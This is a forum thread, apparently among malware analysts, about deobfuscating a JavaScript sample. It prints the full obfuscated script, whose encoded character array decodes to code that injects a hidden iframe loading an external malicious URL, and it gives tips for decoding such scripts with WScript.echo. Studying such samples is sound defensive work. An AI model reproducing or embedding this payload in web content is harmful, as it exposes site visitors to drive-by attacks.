Deobfuscate Javascript, script can't be compiled

[bolzano_1989]

Quote:

Originally Posted by STRELiTZIA

Hello,
Attached, basic ways to deobfuscate js.
The js code injects a malicious hidden !frame which leads to malicious url.

Flash movie link:

PHP Code:

http://www.multiupload.com/AB5F46WGOR 


Regards.

I could follow your helpful tutorial.
Thank you very much for your dynamic analysis tutorial although this way gives us many vulnerabilities .
Could you give me a static analysis way to deobfuscate the Javascript code ?

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Quote:

Originally Posted by qkumba

Just change the final e(s); to "WScript.echo(s)" and you'll see the code.
You can even run the script using cscript.exe and redirect the output to a file.

I follow your instruction, but:
If I put the following code into a .wsf (Windows Script File) and run it:

Code:

Object.prototype.qwe=function()
 {
   return String["fro"+'mCha'+'rCo'+'de'];
 };
 Object.prototype.asd="e";
 var s="";
 try
 {
   {
   }
   ['qwtqwt']();
 }
 catch(q)
 {
   r=1;
 }
 if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof
 {
 }
 .asd.vfr==='undefined')w=2;
 e=eval;
 m=[18/w,18/w,210/w,204/w,64/w,80/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,82/w,246/w,18/w,18/w,18/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,118/w,18/w,18/w,250/w,64/w,202/w,216/w,230/w,202/w,64/w,246/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,238/w,228/w,210/w,232/w,202/w,80/w,68/w,120/w,210/w,204/w,228/w,194/w,218/w,202/w,64/w,230/w,228/w,198/w,122/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,64/w,238/w,210/w,200/w,232/w,208/w,122/w,78/w,98/w,96/w,78/w,64/w,208/w,202/w,210/w,206/w,208/w,232/w,122/w,78/w,98/w,96/w,78/w,64/w,230/w,232/w,242/w,216/w,202/w,122/w,78/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,116/w,208/w,210/w,200/w,200/w,202/w,220/w,118/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,116/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,118/w,216/w,202/w,204/w,232/w,116/w,96/w,118/w,232/w,222/w,224/w,116/w,96/w,118/w,78/w,124/w,120/w,94/w,210/w,204/w,228/w,194/w,218/w,202/w,124/w,68/w,82/w,118/w,18/w,18/w,250/w,18/w,18/w,204/w,234/w,220/w,198/w,232/w,210/w,222/w,220/w,64/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,246/w,18/w,18/w,18/w,236/w,194/w,228/w,64/w,204/w,64/w,122/w,64/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,198/w,228/w,202/w,194/w,232/w,202/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,80/w,78/w,210/w,204/w,228/w,194/w,218/w,202/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,230/w,228/w,198/w,78/w,88/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,82/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,122/w,78/w,208/w,210/w,200/w,200/w,202/w,220/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,122/w,78/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,216/w,202/w,204/w,232/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,232/w,222/w,224/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,238/w,210/w,200/w,232/w,208/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,208/w,202/w,210/w,206/w,208/w,232/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,92/w,194/w,224/w,224/w,202/w,220/w,200/w,134/w,208/w,210/w,216/w,200/w,80/w,204/w,82/w,118/w,18/w,18/w,250/w];
 mm=
 {
 }
 .qwe();
 for(i=0;i<m.length;i++)if(
 {
 }
 .asd==='e')s+=mm(e("m"+"["+"i]")); 
 WScript.echo(s);

I will get the result:

Code:

Line: 29
Char: 12
Error: Invalid entity reference
Code: 8004000C
Source: Windows Script Host

If I put "WScript.echo(s);" to a html file with the obfuscated javascript code and open the html file with Firefox, I don't see the deobfuscated code.

[qkumba]

Quote:

Originally Posted by bolzano_1989

I follow your instruction, but:
If I put the following code into a .wsf (Windows Script File) and run it:
...
I will get the result:

Code:

Line: 29
Char: 12
Error: Invalid entity reference
Code: 8004000C
Source: Windows Script Host

Take another look. The code that you showed here is not the same as the code that you showed earlier. You have "['qwtqwt'];" became "['qwtqwt']();", a "r=0" line is missing, other differences, too. Please use the code that you showed when I first replied. It does run and does display the decoded version.

[bolzano_1989]

Quote:

Originally Posted by qkumba

Take another look. The code that you showed here is not the same as the code that you showed earlier. You have "['qwtqwt'];" became "['qwtqwt']();", a "r=0" line is missing, other differences, too. Please use the code that you showed when I first replied. It does run and does display the decoded version.

Ah, thank you , it works with the modified javascript code.
Last time, I used the original script, so it didn't work with your trick .